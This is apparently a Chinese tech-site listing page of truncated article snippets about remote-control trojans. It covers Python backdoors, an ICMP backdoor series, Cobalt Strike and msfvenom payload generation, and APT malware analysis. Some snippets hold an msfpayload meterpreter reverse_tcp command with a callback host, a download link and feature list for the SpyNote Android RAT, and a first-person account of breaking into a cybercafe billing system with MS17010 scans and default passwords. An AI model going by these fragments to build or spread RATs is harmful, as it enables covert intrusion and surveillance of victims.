首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
python木马远控控制端
2024-10-22
远程控制(远控Bin)
一.概念 控制端:运行在攻击者的电脑中,负责控制其他肉鸡: 被控制端:需要去生成,运行在肉鸡上,木马病毒 二.使用远控Bin工具实现内网远程控制 Step1:打开Kill.exe,点击系统设置,修改监听端口为9999,设置通讯密码: Step2:打开./Plugins/hfs2_3b287/hfs.exe,将虚拟文件目录中的东西全部移除: Step3:右键添加文件,将Consys21.dll添加进去:点击在浏览器中访问. Step4:将Consys21.dll的地址复制,打开kill.exe的服
Python简易远控(单线程版)
1. 技术:管道通信,流文件处理,socket基础 2. Tips: 默认IP:127.0.0.1 默认端口:7676 3. 代码样例: 服务端: #!/usr/bin/env python # encoding: utf-8 import socket import sys from os import * reload(sys) sys.setdefaultencoding("utf-8") def socketInit(): s = socket.socket(socket.AF
python构造远控
server端: import socket import subprocess server=socket.socket() server.bind(('127.0.0.1',4444)) server.listen(5) while True: conn,addr=server.accept() print("new conn:",addr) while True: print(addr) data=conn.recv(1024) print(len(data)) print(da
python+msf 制作 windows远控
最近分析的一个远控,后发现是meterpreter rever http shell,文件是个打包的python(打包成exe),感谢wstone的指导~ 创建dll ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 -t dll X > /tmp/sc.dll python main.py import sys, os import shutil import time import ctyp
HackingTeam重磅炸弹: 估值超1000万美金带有军火交易性质的木马病毒以及远控源代码泄露
[简单介绍] 经常使用网名: 猪头三 出生日期: 1981.XX.XX 个人站点: http://www.x86asm.com QQ交流: 643439947 编程生涯: 2001年~至今[共14年] 职业生涯: 12年 开发语言: C/C++.80x86ASM.PHP.Perl.Objective-C.Object Pascal.C#.Python 开发工具: Visual Studio.Delphi.XCode.Eclipse 技能种类: 逆向 驱动 磁盘 文件 研发领域: Windows应
【逆向&编程实战】Metasploit中的安卓载荷凭什么吊打SpyNote成为安卓端最强远控
文章作者:MG1937 QQ:3496925334 CNBLOG:ALDYS4 未经许可,禁止转载 前言 说起SpyNote大家自然不陌生,这款恶意远控软件被利用在各种攻击场景中 甚至是最近也捕获到了利用"新冠病毒"进行传播的SpyNote样本 方便的Gui操作页面,行云流水的攻击过程... 但它真有那么优秀以至于无懈可击吗? 著名渗透测试框架Metasploit中的安卓载荷和它相比到底如何呢? 文章目录 SpyNote运行流程分析 Payload加载流程比对 APK注入流程比对 灵活
Python解决网吧收费系统,远控网吧电脑设备!
python破解网吧收费系统,远控网吧电脑设备! 很多人学习python,不知道从何学起.很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手.很多已经做案例的人,却不知道如何去学习更加高深的知识.那么针对这三类人,我给大家提供一个好的学习平台,免费领取视频教程,电子书籍,以及课程的源代码!QQ群:1097524789 我今天呢 , 我就没事跟着朋友喝酒喝酒啊.喝了很多啊.晚上到旁边的酒店开了一个房间,到了酒店才十点! 感觉没啥事情干的,那就去网吧走走看吧,看到是一个嘟嘟牛的,和
python破解网吧收费系统,远控网吧电脑设备!
我今天呢 , 我就没事跟着朋友喝酒喝酒啊.喝了很多啊.晚上到旁边的酒店开了一个房间,到了酒店才十点! 感觉没啥事情干的,那就去网吧走走看把,看到是一个嘟嘟牛的,和上次是一样的.还是照常用MS17010 扫描一波.发现一台Xp 没啥用的,后面进去看了下,发现还真的没啥用的东西 那么就继续扫描呗,嘟嘟牛是那个 asp+mysql 架构那么就扫描一下mysql端口 上啊D吧 发现没有.那么就扫一下3308 发现竟然在3308 上去看看.尝试一下默认密码.我看看嘟嘟牛的版本 那么弄一个exp呗 数据
Python3实现ICMP远控后门(上)
这几天一直在研究远控木马的一些通信协议,比如TCP,UDP,ICMP,DNS,HTTP等等,对于TCP,UDP这两种就不讲解了,因为太常见了. 大家可能对采用ICMP,DNS的木马不是很熟悉,其实这两种协议在木马通信上很流行,特点是比较隐蔽,不容易被封锁.HTTP协议主要是用在以大型网站作为C&C服务器的场景,例如之前就有使用twitter作为 C&C服务器. 本次就以ICMP协议进行分析,并使用Python开发出一个ICMP远控后门,在写这篇文章的之前,我感觉大家对ICMP协议肯定不会很
Python3实现ICMP远控后门(中)之“嗅探”黑科技
ICMP后门 前言 第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇 在上两篇文章中,详细讲解了ICMP协议,同时实现了一个具备完整功能的ping工具,完整的代码发布在https://github.com/qiyeboy/LuLunZi/blob/master/NetWork/ping.py中.本次讲的是嗅探,为什么要讲嗅探呢?和ICMP后门有什么关系呢?本篇的干货有点多... 第一节 ICMP后门结构 设计的ICMP后门采用的是典型的C
Python3实现ICMP远控后门(下)之“Boss”出场
ICMP后门 前言 第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇 第三篇:Python3实现ICMP远控后门(中)之"嗅探"黑科技 熬到最后一篇了,本系列的Boss要出场了,实现了一个有意思的ICMP后门,暂时使用pyinstaller打包成了一个win32和64版本,如下图所示. 在前几篇的基础上,本篇扩展的知识点为数据的加密和解密,以及shell的调用,并最终生成一个可用的ICMP后门.本篇总共分为五节,需要花费5分钟时
远控项目(Windows Socket)
实现内容(屏幕,鼠标,键盘实时控制) 控制端: #pragma once #ifndef keybd_H #define keybd_H #include <stdio.h> #include <stdlib.h> int KeyBD(int tch) { && tch < ) { return tch;//A~Z大写 } && tch < ) { return tch;//0~9数字 } && tch < ) {
用nc+简单bat/vbs脚本+winrar制作迷你远控后门
前言 某大佬某天和我聊起了nc,并且提到了nc正反向shell这个概念. 我对nc之前的了解程度仅局限于:可以侦听TCP/UDP端口,发起对应的连接. 真正的远控还没实践过,所以决定写个小后门试一试. 1.NC.正向Shell.反向Shell介绍 1.1 什么是nc: nc是netcat的简写,就是一个简单.可靠的网络工具.当然因为某些奇怪原因,已经被各大杀毒轮番轰炸.原因就和下文所述有关. 1.2 nc的作用: (1)实现任意TCP/UDP端口的侦听,nc可以作为服务器端以TCP或UDP方式侦
手机远控SpyNote教程+软件
链接:https://pan.baidu.com/s/1q0VVSxK0DCJk2VnOg5RgOA 提取码:1okp 生成一个小马界面.可以看到,和以往的远控一样,做好端口映射,定制图标,包名,版本号等等,还可以和别的apk文件捆绑, 点击imei,弹出一个对话框.点击[tool p] 即可. 然后等一段时间,电脑桌面上你会看见这个界面. 1.可以生成一个APK,绑定在被控手机的任何APP上2.可在电脑端控制手机,包括浏览.传输.删除文件等6.麦克风监听7.GPS定位8.APP管理
使用kali生成远控payload
kali linux中的metasploit框架是优秀的渗透框架之一,今天记载一下使用kali生成windows远控木马的过程 生成payload使用的工具是MSFVenom,我们输入msfvenom之后会显示出它的基本参数 在这里我们没有设置参数,所以第一行出现了一个错误 这里我们主要讲windows下payloads的生成和利用,在第五行里面我们看到已经给出了一个生成payload的例子,这个例子生成的就是windwos下的木马 即: Example: /usr/bin/msfvenom -
基于gRPC编写golang简单C2远控
概述 构建一个简单的远控木马需要编写三个独立的部分:植入程序.服务端程序和管理程序. 植入程序是运行在目标机器上的远控木马的一部分.植入程序会定期轮询服务器以查找新的命令,然后将命令输出发回给服务器. 管理程序是运行在用户机器上的客户端,用于发出实际的命令. 服务端则负责与植入程序和客户端的交互,接收客户端的指令,并在植入程序请求时,将命令发送给植入程序,随后将植入程序发送来的结果传递给客户端. gRPC 这里通过gRPC构建所有的网络交互. 关于gRPC.Protobuf.protoc请参考h
cobaltstrike进行局域网远控
用cobaltstrike进行局域网远控 cobalt strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端. 实验原理:用cobaltstrike生成木马,发送到目标主机上,双击运行后反向链接到cobaltstrike监听的端口,实现远程控制 本次实验的cobaltstrike安装在kali中 点开文件 3.按住shift,右击黑色区域,点击"在终端打开",sudo su,进入超级管理员权限 4.首先给文件
Python3实现ICMP远控后门(上)_补充篇
ICMP后门(上)补充篇 前言 在上一篇文章Python3实现ICMP远控后门(上)中,我简要讲解了ICMP协议,以及实现了一个简单的ping功能,在文章发表之后,后台很多朋友留言,说对校验和的计算不是很了解,实现的ping功能仅实现了发送,接收没有实现,一个完整ping如何实现等等.本来对于ICMP后门写三篇文章的,但是对大家的疑惑临时开辟了一个补充篇,对ICMP协议校验方式,以及实现一个完整功能的ping给大家进行详细的讲解. 第一节 ICMP协议校验和 对于校验和的计算,我对写校验和的代码
拍拍熊(APT-C-37),诱导方式、DNS、安卓远控
诱导方式 1.含有正常APP功能的伪装 2.文件图标伪装 RAR 1.Android DroidJack SpyNote Windows njRAT njRAT[2]又称Bladabindi,通过控制端可以操作受控端的注册表,进程,文件等,还可以对被控端的键盘进行记录.同时njRAT采用了插件机制,可以通过不同的插件来扩展njRAT的功能. 该组织在使用njRAT时大多不是直接使用,而是在njRAT的基础上进行了二次封装,使用C#为njRAT加了一层壳,并对壳的代码进行了大量的混淆.该壳的作用是
利用kage把msf变成可视化远控平台
项目下载https://github.com/WayzDev/Kage/releases 这里用kali系统演示 1,先下载kage: 2,右击给予执行权限 3,启动msf msfconsole -q -x 'load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msfuser Pass=msfpass' 注意:如果kage跟msf不在一个机器上,上面命令如果不带serverhost参数,则只容许127.0.0.1链接我们也那么可以通过 msf
热门专题
spi gpio模拟
app 解决持续定位耗电的问题
python操作单元格
npm基本操作(安装,搭建环境,打包)
freeswitch 注册的分机拨打不了电话
MVC方式调用API
iter 生成增强forxun
js 方法中获取到被调用的对象
Z-Blog apa 伪静态
solidworks零件添加材料没有质量
用牛顿插值公式计算近似值matlab
APP端用户更换头像
vue springboot 自己搭建网站
glTexImage2D 分辨率
centos7 2009 和 1908 的区别
matlab导航工具箱
在MariaDB的授权语句远程主机是什么
Windows如何将文件夹打包成.tar.gz
vue3 arco checkbox改变之后不更新
一种更便捷快速的电脑启动配置